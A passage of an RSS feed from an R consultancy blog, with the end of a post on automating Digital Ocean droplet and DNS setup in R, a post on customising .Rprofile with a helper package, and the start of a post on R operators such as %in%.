&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_latest_training_snapshot&lt;/span&gt;(region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image_base)[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this code chunk we are obtaining the latest snapshot created in the Jumping River’s Digital Ocean organization, searching by base image, meaning searching if the R image or the Python image. These base images are built using a tool named Packer, however implementation details of this process will come in a future post. The equivalent of this code chunk would be when creating a droplet, to select the Snapshots tab and manually pick the training snapshot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplet_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;id)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this code chunk we are using the package analogsea which is the backbone of our {jrDroplet} package. {analogsea} is a package to manage Digital Ocean infrastructure through the API and following Open Source principles, we are building on it for our specific use case. In this case, we are using the &lt;code&gt;droplet_create()&lt;/code&gt; function to create the Droplet for our training VM with the desired parameters, and based on the latest training snapshot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplets&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ip_address &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplets[[droplet_name]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;networks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;v4[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;domain_record_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dns_root,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;A&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is the final code chunk we are going to discuss in this post. What we are doing here is first listing all of the available droplets to then search for the IP address of the droplet created. We need this IP address for the function &lt;code&gt;domain_record_create()&lt;/code&gt;. Very briefly, a Domain Record is a record connecting a specific name to a specific IP address, and they are stored in Domain Name Services. So in this command, we are taking the IP address and using our base DNS root name to create a new subdomain specifically for this new droplet. If we were to do this through the DO interface we would need to go to the Networking Tab and select things from Dropdown menus.&lt;/p&gt;
&lt;p&gt;This is just one example of how we use R as a tool for Systems Administration. Another tool we have created is called monitR and it’s a package to monitor the full stack of services that might be offered to a specific client. This tool has the back-end functions to manage the data, building upon existing system administration tools and frameworks. It also has a Shiny dashboard that allows us to visualize all the data for our clients. In conclusion, R has many uses aside from the classical statistical analyses and shouldn’t be limited as a language solely for Data Scientists.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Customising your Rprofile</title><link>https://www.jumpingrivers.com/blog/customising-your-rprofile/</link><pubDate>Fri, 17 Jan 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/customising-your-rprofile/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/customising-your-rprofile/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/customising-your-rprofile/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="what-is-an-rprofile"&gt;What is an Rprofile&lt;/h1&gt;
&lt;p&gt;Every time R starts, it runs through a couple of R scripts. One of these scripts is the &lt;code&gt;.Rprofile&lt;/code&gt;. This allows users to customise their particular set-up. However, some care has to be taken, as if this script is broken, this can cause R to break. If this happens, just delete the script!&lt;/p&gt;
&lt;p&gt;Full details of how the .Rprofile works can be found in my book with Robin on &lt;a href="https://csgillespie.github.io/efficientR/set-up.html#r-startup" rel="external"&gt;Efficient R programming&lt;/a&gt;. However, roughly R will look for a file called &lt;code&gt;.Rprofile&lt;/code&gt; first in your current working directory, then in your home area. Crucially, it will only load the first file found. This means you can have per project Rprofile.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-customising-your-rprofile"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h1 id="my-rprofile"&gt;My Rprofile&lt;/h1&gt;
&lt;p&gt;A few months ago, I noticed my Rprofile was becoming increasing untidy, so I bundled it up into a single, opinionated, package. This also made it easier for me to switch between computers. Last week, there was an interesting twitter thread on customising your &lt;code&gt;.Rprofile&lt;/code&gt; started by &lt;a href="https://twitter.com/kara_woo/" rel="external"&gt;Kara Woo&lt;/a&gt;. The thread became popular with lots of great suggestions on neat customisations. This also provided the impetus to write this post.&lt;/p&gt;
&lt;h2 id="installation"&gt;Installation&lt;/h2&gt;
&lt;p&gt;You can install the package from &lt;a href="https://github.com/csgillespie/rprofile" rel="external"&gt;GitHub&lt;/a&gt; with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install.packages(&amp;#34;remotes&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;csgillespie/rprofile&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The package also uses two non-cran packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Used for nice prompts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gaborcsardi/prompt&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Used for nice colours in the terminal; not for Windows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jalvesaq/colorout&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="r-prompt"&gt;R Prompt&lt;/h2&gt;
&lt;p&gt;You can make simple customisations to your R prompt using &lt;code&gt;options()&lt;/code&gt;, but for extra bling I use the the {prompt} package.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you are in a Git repo, the branch will be displayed.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-prompt-300x127.jpg" style="width:400px; class:image-center"&gt;
&lt;ul&gt;
&lt;li&gt;If R’s memory becomes large, the size will also be displayed.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-prompt-big.jpg" style="width:400px; class:image-center"&gt;
&lt;p&gt;As the RStudio console already has alot of nice features, e.g. syntax highlighting, a distinction needs to be made between the RStudio &lt;em&gt;Console&lt;/em&gt; and running R in the terminal. So in &lt;code&gt;.Rprofile&lt;/code&gt; I’ve got some logic to detect where I’m running R (in my .Rprofile) and adjust accordingly.&lt;/p&gt;
&lt;h3 id="useful-start-up-messages"&gt;Useful Start-up Messages&lt;/h3&gt;
&lt;p&gt;If you use R a lot, you want to minimise noise. I used to have the {fortunes} package display a fortune in my profile, but this got repetitive. Then I tried grabbing stuff from twitter, but this slowed everything down when the wifi was poor.&lt;/p&gt;
&lt;p&gt;Currently three start-up messages are displayed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The wifi network you are connected too with speed info (Linux only)&lt;/li&gt;
&lt;li&gt;The number of open R sessions (Linux only)&lt;/li&gt;
&lt;li&gt;RStudio project info&lt;/li&gt;
&lt;li&gt;I also clear all the standard R licence stuff from the screen.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-startup-message-300x118.jpg" style="width:400px; class:image-center"&gt;
&lt;p&gt;If anyone wants to expand the Linux only functions to Windows and Macs, please submit a pull request!&lt;/p&gt;
&lt;h2 id="helper-functions"&gt;Helper Functions&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s always dangerous to load functions in your start-up script, so I&amp;rsquo;ve only included functions I’m fairly sure won’t be used in a script.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;create_make_functions()&lt;/code&gt; - if you have a &lt;code&gt;Makefile&lt;/code&gt; in your working directory, this will automatically generate all associated make functions. For example, if you have a &lt;code&gt;force&lt;/code&gt; argument in the &lt;code&gt;Makefile&lt;/code&gt; this will generate &lt;code&gt;make_force()&lt;/code&gt;. This is actually run at startup.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;lsos()&lt;/code&gt; - a handy function for listing large objects.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;library()&lt;/code&gt; - Over writes the &lt;code&gt;library()&lt;/code&gt; function with a smarter version. If a package is missing, automatically provides the option to install from CRAN or GitHub.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;last_error()&lt;/code&gt; and &lt;code&gt;last_trace()&lt;/code&gt; - pre-loads from {rlang}. Nicer error investigation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="rstudio-functions"&gt;RStudio Functions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;op(path = &amp;quot;.&amp;quot;)&lt;/code&gt; - Creates &amp;amp; opens an RStudio project in the directory specified.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cp()&lt;/code&gt; - Lists previous RStudio projects and gives an option to open.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;inf_mr()&lt;/code&gt; - Short cut to &lt;code&gt;xaringan::inf_mr()&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-cp-300x101.png" style="width:400px; class:image-center"&gt;
&lt;h3 id="setting-better-options"&gt;Setting Better &lt;code&gt;options()&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;set_startup_options()&lt;/code&gt; function sets better (in my opinion) set of start-up options. These include&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Setting &lt;code&gt;Ncpus&lt;/code&gt; to run parallel installs by default&lt;/li&gt;
&lt;li&gt;Removing significant stars&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;mc.cores&lt;/code&gt; to a sensible default&lt;/li&gt;
&lt;li&gt;Change the &lt;code&gt;continue = &amp;quot;+&amp;quot;&lt;/code&gt; to a blank space&lt;/li&gt;
&lt;li&gt;Reduce the default print length&lt;/li&gt;
&lt;li&gt;Plus a few others (see &lt;code&gt;?set_startup_options&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I&amp;rsquo;ve also created a convenience function for adding additional R repositories - &lt;code&gt;set_repos()&lt;/code&gt;. Probably not needed by most people.&lt;/p&gt;
&lt;h2 id="example-rprofile"&gt;Example &lt;code&gt;.Rprofile&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Open your &lt;code&gt;.Rprofile&lt;/code&gt;, e.g. &lt;code&gt;file.edit(&amp;quot;~/.Rprofile&amp;quot;)&lt;/code&gt; and customise however you want. Here’s an example&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;interactive&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;requireNamespace&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rprofile&amp;#34;&lt;/span&gt;, quietly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Only useful if you use Makefiles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_make_functions&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Startup options&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_startup_options&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Not RStudio console&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_terminal&lt;/span&gt;()) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_terminal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_rstudio&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .env &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_functions&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;attach&lt;/span&gt;(.env)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Display wifi and no of R sessions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Linux only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_startup_info&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Prints RStudio project on start-up&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setHook&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstudio.sessionInit&amp;#34;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(newSession) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; active_rproj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_active_rproj&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(active_rproj)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{crayon::yellow(&amp;#39;R-project:&amp;#39;)} {active_rproj}&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}, action &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;append&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="notes-and-thanks"&gt;Notes and thanks&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;lsos()&lt;/code&gt; function was taken from the &lt;a href="https://stackoverflow.com/q/1358003/203420" rel="external"&gt;SO&lt;/a&gt; question.&lt;/li&gt;
&lt;li&gt;The improved version of &lt;code&gt;library()&lt;/code&gt; was adapted from the &lt;a href="https://github.com/jimhester/autoinst/" rel="external"&gt;autoinst&lt;/a&gt;. I did think about importing the package, but I had made too many personal tweaks.&lt;/li&gt;
&lt;li&gt;Setting the prompt uses the excellent &lt;a href="https://github.com/gaborcsardi/prompt" rel="external"&gt;prompt&lt;/a&gt; package.&lt;/li&gt;
&lt;li&gt;I&amp;rsquo;ve probably &amp;ldquo;borrowed&amp;rdquo; some of the other ideas from blogposts and SO questions. If I&amp;rsquo;ve missed crediting you, please let me know and I&amp;rsquo;ll rectify it.&lt;/li&gt;
&lt;li&gt;If you have any suggestions or find bugs, please use the GitHub &lt;a href="https://github.com/csgillespie/rprofile/issues" rel="external"&gt;issue tracker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Feel free to submit pull requests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/customising-your-rprofile/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Key R Operators</title><link>https://www.jumpingrivers.com/blog/r-overview-operators/</link><pubDate>Wed, 11 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-overview-operators/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-overview-operators/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-overview-operators/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="operators-you-should-make-more-use-of-in-r"&gt;Operators you should make more use of in R&lt;/h1&gt;
&lt;p&gt;Only recently have I discovered the true power of some the operators in R. Here are some tips on some underused operators in R:&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-overview-operators"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-in-operator"&gt;The %in% operator&lt;/h3&gt;
&lt;p&gt;This funny looking operator is very handy. It’s short for testing if several values appear in an object. For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To grab all the values where x is 2, 4 or 14 we could do&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 4 4 14 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;or we could use &lt;code&gt;%in%&lt;/code&gt; …&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 4 4 14 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is something I use all the time for filtering data. Imagine you’ve got a tibble of data relating to the world (step up {spData})&lt;/p&gt;
